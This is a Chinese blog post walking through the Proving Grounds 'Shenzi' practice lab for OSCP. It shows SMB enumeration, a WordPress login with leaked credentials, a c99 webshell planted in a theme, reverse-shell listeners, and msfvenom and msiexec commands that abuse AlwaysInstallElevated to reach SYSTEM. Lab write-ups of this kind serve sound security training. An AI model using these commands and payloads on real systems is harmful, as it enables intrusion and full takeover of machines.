<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
<meta name="baidu-site-verification" content="codeva-l4PbCwKc7Z">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="google-site-verification" content="FEUc84rh7dgaXl_JOY_Bq7sulvZljH">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Monaco:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"www.thiiiiink.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"default"},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":true,"lazyload":true,"pangu":true,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":false,"nav":null,"activeClass":"gitalk"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="Proving Grounds Practice Lab中Shenzi打靶过程记录">
<meta property="og:type" content="article">
<meta property="og:title" content="Proving Grounds Practice - Shenzi">
<meta property="og:url" content="https://www.thiiiiink.com/post/20250226023557.html">
<meta property="og:site_name" content="临渊羡鱼">
<meta property="og:description" content="Proving Grounds Practice Lab中Shenzi打靶过程记录">
<meta property="og:locale">
<meta property="og:image" content="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=ZWRjMDZmYzBiYzViNzI1NmVjNDNjNjc4Nzc4Yzk1NWVfQUdUWFlrUWU5RVc3VmFGTTRRcmlzU3NrVkFMbW5FNWpfVG9rZW46TlpUYmJUN1Zpb01EZ0R4NDFFaWM2RWNLblRjXzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA">
<meta property="og:image" content="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=YWUxZWY5OWJhZWQwZTExOWIyZThhMDJlYzc2ZDVlOGVfOHN6ZlRaZzMzRmV3dFA0TzA0TkdoM21Ea2JFS1BUdFZfVG9rZW46WHJaSWI0ZU4xbzZKWDJ4T2tnV2NwOFJqbkVlXzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA">
<meta property="og:image" content="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=NzNmZmE4NzZjNmUwZThjZDk0MWJmODk2MGJkZTM3YjBfb0lVcDl1NmFkbFIzTkJYYnJyRVZvOTNUQlRwUTluM3JfVG9rZW46SXlyd2JNV3k1bzlsRmt4dUsxbWM1SU5xblViXzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA">
<meta property="og:image" content="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=NzE2YzQzNDU3Yjg2ODdiNWFhMWNiN2RiODc2YmE3YjlfekVGb2dSTWE4VzMzSE91Wmp0blppc3J4TE1ocjVTbURfVG9rZW46QTliUWJRUWlFb1FsWDd4Z3FuZWNwSnJzblJiXzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA">
<meta property="og:image" content="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=OWJiNGUyY2Q4NmY4NTM1NDYyODU0OTQyZDM4YTNlMjVfNVdQR0pNZUU0U0pVSWU5Q1JObXdWWDBKQVczOUZuQktfVG9rZW46TkFwQWJkeGRab1Vnclp4aDhvWWNrZVkwbnBmXzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA">
<meta property="og:image" content="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=YmQ2MzAyZmQxNWE0MWExMjA3MWY4Mjg1ODYxZDU2ZTFfd0NNT0FNVHlKeXRPT1ZTYVhFTFVJTVRQSjRuNnZTS2dfVG9rZW46QW82WGJBcUpZb3ZLeGJ4anF0QWN3bTRybnNmXzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA">
<meta property="og:image" content="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=MjM3NTQyNTA3Yzk5NDIyMGMzMWJhM2M3NmY3YmZhNjdfMDhmSElhMTE5ZjczSTBLSG1SR2NMMlNvM1B4U2l1VThfVG9rZW46WlZOVGI0a3dTb1F6aTR4RkxNb2NlVHRsbld2XzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA">
<meta property="og:image" content="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=NDdlODI0NzVjNjg0NDJjZjcwOWQ3NjBiYzNiOWY5OTdfZEN0aWRobzd5WExnWUFYTGNoWFhmTThqckQyRWNGUFNfVG9rZW46WXZDQmJlMldLb3NQOUJ4R1gxYWM0OVdqbjZnXzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA">
<meta property="og:image" content="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=YmJiYzYxZDI0ZjI2ZWFjYWQ1MGVjMTNjZDFkM2U3MjBfMDhpT2xmUDI5enJKTDFubTFIdTVBTFlOYXJkZFpyOG1fVG9rZW46UXRjWmI3b292bzlxcXJ4YTVBRmNiS3ZrbmFnXzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA">
<meta property="article:published_time" content="2025-02-25T18:35:57.000Z">
<meta property="article:modified_time" content="2025-05-04T18:50:10.349Z">
<meta property="article:author" content="Yiaos">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=ZWRjMDZmYzBiYzViNzI1NmVjNDNjNjc4Nzc4Yzk1NWVfQUdUWFlrUWU5RVc3VmFGTTRRcmlzU3NrVkFMbW5FNWpfVG9rZW46TlpUYmJUN1Zpb01EZ0R4NDFFaWM2RWNLblRjXzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA">

<link rel="canonical" href="https://www.thiiiiink.com/post/20250226023557.html">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-Hans'
  };
</script>

  <title>Proving Grounds Practice - Shenzi | 临渊羡鱼</title>
  
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-J67WGCEZY5"></script>
    <script>
      if (CONFIG.hostname === location.hostname) {
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', 'G-J67WGCEZY5');
      }
    </script>


  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?257c5564d6a2b53ffc355cd89f5f2095";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta custom-logo">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">临渊羡鱼</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">退而结网</p>
      <a>
        <img class="custom-logo-image" src="/images/avatar.gif" alt="临渊羡鱼">
      </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" placeholder="Searching..." spellcheck="false" type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="https://www.thiiiiink.com/post/20250226023557.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Yiaos">
      <meta itemprop="description" content>
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="临渊羡鱼">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Proving Grounds Practice - Shenzi
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2025-02-26 02:35:57" itemprop="dateCreated datePublished" datetime="2025-02-26T02:35:57+08:00">2025-02-26</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2025-05-05 02:50:10" itemprop="dateModified" datetime="2025-05-05T02:50:10+08:00">2025-05-05</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/What-We-Do-%E4%B8%89%E5%A4%A9%E6%89%93%E9%B1%BC/" itemprop="url" rel="index"><span itemprop="name">What We Do-三天打鱼</span></a>
                </span>
                  , 
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/What-We-Do-%E4%B8%89%E5%A4%A9%E6%89%93%E9%B1%BC/OSCP/" itemprop="url" rel="index"><span itemprop="name">OSCP</span></a>
                </span>
                  , 
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/What-We-Do-%E4%B8%89%E5%A4%A9%E6%89%93%E9%B1%BC/OSCP/PG-Lab/" itemprop="url" rel="index"><span itemprop="name">PG Lab</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
            <div class="post-description">Proving Grounds Practice Lab中Shenzi打靶过程记录</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="Difficulty"><a href="#Difficulty" class="headerlink" title="Difficulty"></a>Difficulty</h1><p>Medium</p>
<h1 id="Scan"><a href="#Scan" class="headerlink" title="Scan"></a>Scan</h1><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">[*] ftp found on tcp/<span class="number">21</span>.</span><br><span class="line">     FileZilla ftpd <span class="number">0.9</span>.<span class="number">41</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[*] http found on tcp/<span class="number">80</span>.</span><br><span class="line">    Apache/<span class="number">2.4</span>.<span class="number">43</span> (Win64) OpenSSL/<span class="number">1.1</span>.<span class="number">1</span>g PHP/<span class="number">7.4</span>.<span class="number">6</span></span><br><span class="line">    Welcome to XAMPP</span><br><span class="line">    img  icons Webalizer</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[*] msrpc found on tcp/<span class="number">135</span>.</span><br><span class="line"></span><br><span class="line">[*] netbios<span class="literal">-ssn</span> found on tcp/<span class="number">139</span>.</span><br><span class="line"></span><br><span class="line">[*] http found on tcp/<span class="number">443</span>.</span><br><span class="line"></span><br><span class="line">[*] microsoft<span class="literal">-ds</span> found on tcp/<span class="number">445</span>.</span><br><span class="line">    annoymous found default passwords</span><br><span class="line">        mysql: root: empty</span><br><span class="line">        Mercury:  newuser: wampp</span><br><span class="line">        webdav: xampp<span class="literal">-dav-unsecure</span>: ppmax2011</span><br><span class="line">        wordpress: admin: FeltHeadwallWight357</span><br><span class="line">        phpmyadmin: root: secret/http</span><br></pre></td></tr></table></figure>

<h2 id="21-ftp"><a href="#21-ftp" class="headerlink" title="21 ftp"></a>21 ftp</h2><p>无法登录</p>
<h1 id="80-443-xampp"><a href="#80-443-xampp" class="headerlink" title="80&#x2F;443 xampp"></a>80&#x2F;443 xampp</h1><p>Xampp默认页面，</p>
<p><img data-src="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=ZWRjMDZmYzBiYzViNzI1NmVjNDNjNjc4Nzc4Yzk1NWVfQUdUWFlrUWU5RVc3VmFGTTRRcmlzU3NrVkFMbW5FNWpfVG9rZW46TlpUYmJUN1Zpb01EZ0R4NDFFaWM2RWNLblRjXzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA"></p>
<p>页面上phpInfo页面发现有shenzi用户</p>
<p><img data-src="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=YWUxZWY5OWJhZWQwZTExOWIyZThhMDJlYzc2ZDVlOGVfOHN6ZlRaZzMzRmV3dFA0TzA0TkdoM21Ea2JFS1BUdFZfVG9rZW46WHJaSWI0ZU4xbzZKWDJ4T2tnV2NwOFJqbkVlXzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA"></p>
<p>phpadmin提示只能local network才能访问，使用burpsuite bypasswaf插件尝试绕过，无法成功</p>
<blockquote>
<p>Grok3：xammp 会直接取clientip, 因为中间也没有nginx之类的网关&#x2F;代理</p>
</blockquote>
<p><img data-src="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=NzNmZmE4NzZjNmUwZThjZDk0MWJmODk2MGJkZTM3YjBfb0lVcDl1NmFkbFIzTkJYYnJyRVZvOTNUQlRwUTluM3JfVG9rZW46SXlyd2JNV3k1bzlsRmt4dUsxbWM1SU5xblViXzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA"></p>
<h2 id="445-smb"><a href="#445-smb" class="headerlink" title="445  smb"></a>445  smb</h2><p>可以匿名登录, 文件全部下载， password文件中发现</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">smbclient //<span class="number">192.168</span>.<span class="number">111.55</span>/Shenzi <span class="literal">-N</span></span><br><span class="line"><span class="keyword">Try</span> <span class="string">&quot;help&quot;</span> to get a list of possible commands.</span><br><span class="line">smb: \&gt; <span class="built_in">ls</span></span><br><span class="line">  .                                   D        <span class="number">0</span>  Thu May <span class="number">28</span> <span class="number">23</span>:<span class="number">45</span>:<span class="number">09</span> <span class="number">2020</span></span><br><span class="line">  ..                                  D        <span class="number">0</span>  Thu May <span class="number">28</span> <span class="number">23</span>:<span class="number">45</span>:<span class="number">09</span> <span class="number">2020</span></span><br><span class="line">  passwords.txt                       A      <span class="number">894</span>  Thu May <span class="number">28</span> <span class="number">23</span>:<span class="number">45</span>:<span class="number">09</span> <span class="number">2020</span></span><br><span class="line">  readme_en.txt                       A     <span class="number">7367</span>  Thu May <span class="number">28</span> <span class="number">23</span>:<span class="number">45</span>:<span class="number">09</span> <span class="number">2020</span></span><br><span class="line">  sess_klk75u2q4rpgfjs3785h6hpipp      A     <span class="number">3879</span>  Thu May <span class="number">28</span> <span class="number">23</span>:<span class="number">45</span>:<span class="number">09</span> <span class="number">2020</span></span><br><span class="line">  why.tmp                             A      <span class="number">213</span>  Thu May <span class="number">28</span> <span class="number">23</span>:<span class="number">45</span>:<span class="number">09</span> <span class="number">2020</span></span><br><span class="line">  xampp<span class="literal">-control</span>.ini                   A      <span class="number">178</span>  Thu May <span class="number">28</span> <span class="number">23</span>:<span class="number">45</span>:<span class="number">09</span> <span class="number">2020</span></span><br><span class="line"></span><br><span class="line">                <span class="number">12941823</span> blocks of size <span class="number">4096</span>. <span class="number">6497008</span> blocks available</span><br><span class="line">smb: \&gt; </span><br></pre></td></tr></table></figure>

<p>passwords.txt文件中发现了一些账号密码，分别记录后使用hydra爆破下smb和ftp都以失败告终 <code>hydra -l shenzi -P pass.txt -s 21 192.168.184.55 ftp</code></p>
<p><img data-src="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=NzE2YzQzNDU3Yjg2ODdiNWFhMWNiN2RiODc2YmE3YjlfekVGb2dSTWE4VzMzSE91Wmp0blppc3J4TE1ocjVTbURfVG9rZW46QTliUWJRUWlFb1FsWDd4Z3FuZWNwSnJzblJiXzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA"></p>
<p>readme_en.txt中发现一段mailtodesk会把邮件内容写到本地文件，一番搜索尝试没有结果</p>
<p><img data-src="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=OWJiNGUyY2Q4NmY4NTM1NDYyODU0OTQyZDM4YTNlMjVfNVdQR0pNZUU0U0pVSWU5Q1JObXdWWDBKQVczOUZuQktfVG9rZW46TkFwQWJkeGRab1Vnclp4aDhvWWNrZVkwbnBmXzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA"></p>
<p>在xampp-contorl.ini中看到启动了mysql和apache,其他没有更多发现</p>
<p><img data-src="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=YmQ2MzAyZmQxNWE0MWExMjA3MWY4Mjg1ODYxZDU2ZTFfd0NNT0FNVHlKeXRPT1ZTYVhFTFVJTVRQSjRuNnZTS2dfVG9rZW46QW82WGJBcUpZb3ZLeGJ4anF0QWN3bTRybnNmXzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA"></p>
<p>搞不定了，查看hit: <code>Enumerate SMB shares to find an important file. Then, use some guesswork to locate the Wordpress website.</code></p>
<p>80端口也用wpsacn扫了，看来是目录不对，猜测是&#x2F;shenzi&#x2F;, 访问 <code>http://192.168.111.55/shenzi/wp-admin</code> ，使用 <code>admin:FeltHeadwallWight357</code>登录成功</p>
<p><img data-src="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=MjM3NTQyNTA3Yzk5NDIyMGMzMWJhM2M3NmY3YmZhNjdfMDhmSElhMTE5ZjczSTBLSG1SR2NMMlNvM1B4U2l1VThfVG9rZW46WlZOVGI0a3dTb1F6aTR4RkxNb2NlVHRsbld2XzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA"></p>
<h1 id="Foothold"><a href="#Foothold" class="headerlink" title="Foothold"></a>Foothold</h1><p>wordpress利用方式</p>
<blockquote>
<p><a target="_blank" rel="external nofollow noopener noreferrer" href="https://www.hackercoolmagazine.com/wordpress-reverse-shelling-multiple-methods/">https://www.hackercoolmagazine.com/wordpress-reverse-shelling-multiple-methods/</a></p>
</blockquote>
<p>直接修改404页面为c99 webshell</p>
<blockquote>
<p><a target="_blank" rel="external nofollow noopener noreferrer" href="https://github.com/phpwebshell/c99shell/blob/main/c99.php">https://github.com/phpwebshell/c99shell/blob/main/c99.php</a></p>
</blockquote>
<p>revshell.com生成powershell反弹shell命令</p>
<p><img data-src="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=NDdlODI0NzVjNjg0NDJjZjcwOWQ3NjBiYzNiOWY5OTdfZEN0aWRobzd5WExnWUFYTGNoWFhmTThqckQyRWNGUFNfVG9rZW46WXZDQmJlMldLb3NQOUJ4R1gxYWM0OVdqbjZnXzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA"></p>
<p>复制后执行，得到shenzi powershell</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">rlwrap nc <span class="literal">-nvlp</span> <span class="number">4444</span></span><br><span class="line">listening on [<span class="type">any</span>] <span class="number">4444</span> ...</span><br><span class="line">connect to <span class="function">[<span class="number">192.168</span><span class="type">.45.234</span>] <span class="title">from</span></span> (UNKNOWN) [<span class="number">192.168</span><span class="type">.184.55</span>] <span class="number">61137</span></span><br><span class="line">id</span><br><span class="line"><span class="built_in">PS</span> C:\xampp\htdocs\shenzi\wp<span class="literal">-content</span>\plugins\malicious&gt; whoami</span><br><span class="line">shenzi\shenzi</span><br></pre></td></tr></table></figure>

<h1 id="Escalation"><a href="#Escalation" class="headerlink" title="Escalation"></a>Escalation</h1><p>首先测试一下只能本地访问的数据库，<code>mysql -u root</code>无密码登录成功，但是找不到什么有用信息</p>
<h2 id="alwaysInstallElevated"><a href="#alwaysInstallElevated" class="headerlink" title="alwaysInstallElevated"></a>alwaysInstallElevated</h2><p>上传winpeas收集信息， 点击链接查看一下</p>
<blockquote>
<p><a target="_blank" rel="external nofollow noopener noreferrer" href="https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated">https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated</a></p>
<p>扩展阅读： <a target="_blank" rel="external nofollow noopener noreferrer" href="https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/">https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/</a></p>
</blockquote>
<p>如果启用了这两个寄存器（值为 0x1），那么任何权限的用户都可以 NT AUTHORITY\SYSTEM 的身份安装（执行）*.msi 文件。</p>
<p><img data-src="https://ve0zkk9dxj.feishu.cn/space/api/box/stream/download/asynccode/?code=YmJiYzYxZDI0ZjI2ZWFjYWQ1MGVjMTNjZDFkM2U3MjBfMDhpT2xmUDI5enJKTDFubTFIdTVBTFlOYXJkZFpyOG1fVG9rZW46UXRjWmI3b292bzlxcXJ4YTVBRmNiS3ZrbmFnXzE3NDA1MDg1MzU6MTc0MDUxMjEzNV9WNA"></p>
<p>利用方式：</p>
<ol>
<li>本地生成msi文件 <code>msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.165 LPORT=443 -f msi ~/pentestools/tmp/r.msi</code></li>
</ol>
<blockquote>
<p>文档中还额外提供了uac的利用方式</p>
<p>msfvenom -p windows&#x2F;adduser USER&#x3D;rottenadmin PASS&#x3D;P@ssword123! -f msi-nouac -o alwe.msi #No uac format<br>msfvenom -p windows&#x2F;adduser USER&#x3D;rottenadmin PASS&#x3D;P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted</p>
</blockquote>
<ol start="2">
<li>在目标机器上执行 <code>msiexec /qn /i r.msi</code></li>
</ol>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">C:\users\shenzi&gt;msiexec /quiet /qn /i rr.msi</span><br><span class="line">msiexec /quiet /qn /i rr.msi</span><br></pre></td></tr></table></figure>

<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">rlwrap nc <span class="literal">-nvlp</span> <span class="number">443</span></span><br><span class="line">listening on [<span class="type">any</span>] <span class="number">443</span> ...</span><br><span class="line">connect to <span class="function">[<span class="number">192.168</span><span class="type">.45.165</span>] <span class="title">from</span></span> (UNKNOWN) [<span class="number">192.168</span><span class="type">.111.55</span>] <span class="number">51913</span></span><br><span class="line">Microsoft Windows [<span class="type">Version</span> <span class="number">10.0</span><span class="type">.19042.1526</span>]</span><br><span class="line">(c) Microsoft Corporation. All rights reserved.</span><br><span class="line"></span><br><span class="line">C:\WINDOWS\system32&gt;whoami</span><br><span class="line">whoami</span><br><span class="line">nt authority\system</span><br></pre></td></tr></table></figure>

<p>插曲：<code>msiexec /quiet /qn /i rr.msi</code>在反弹的powershell中怎么都成功不了，使用怀疑是powershell的问题，执行cmd想切到cmd试试，但是发现也切换不了，最后msfvenom生成一个反弹cmd exe，重新执行msiexec获取system权限</p>
<h1 id="反思"><a href="#反思" class="headerlink" title="反思"></a>反思</h1><ol>
<li>收集信息阶段，收集到很多信息，怎么甄别哪个是最有可能利用的呢，想不到shenzi目录啊</li>
<li>提权时发现alwaysInstallElevated应该有意识地先查一下</li>
</ol>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Yiaos
  </li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="https://www.thiiiiink.com/post/20250226023557.html" title="Proving Grounds Practice - Shenzi">https://www.thiiiiink.com/post/20250226023557.html</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow noopener noreferrer" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> unless stating additionally.
  </li>
</ul>
</div>


      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/post/20250228015654.html" rel="prev" title="Proving Grounds Practice - Nickel">
      <i class="fa fa-chevron-left"></i> Proving Grounds Practice - Nickel
    </a></div>
      <div class="post-nav-item">
    <a href="/post/20250223233825.html" rel="next" title="Proving Grounds Practice - Hepet">
      Proving Grounds Practice - Hepet <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
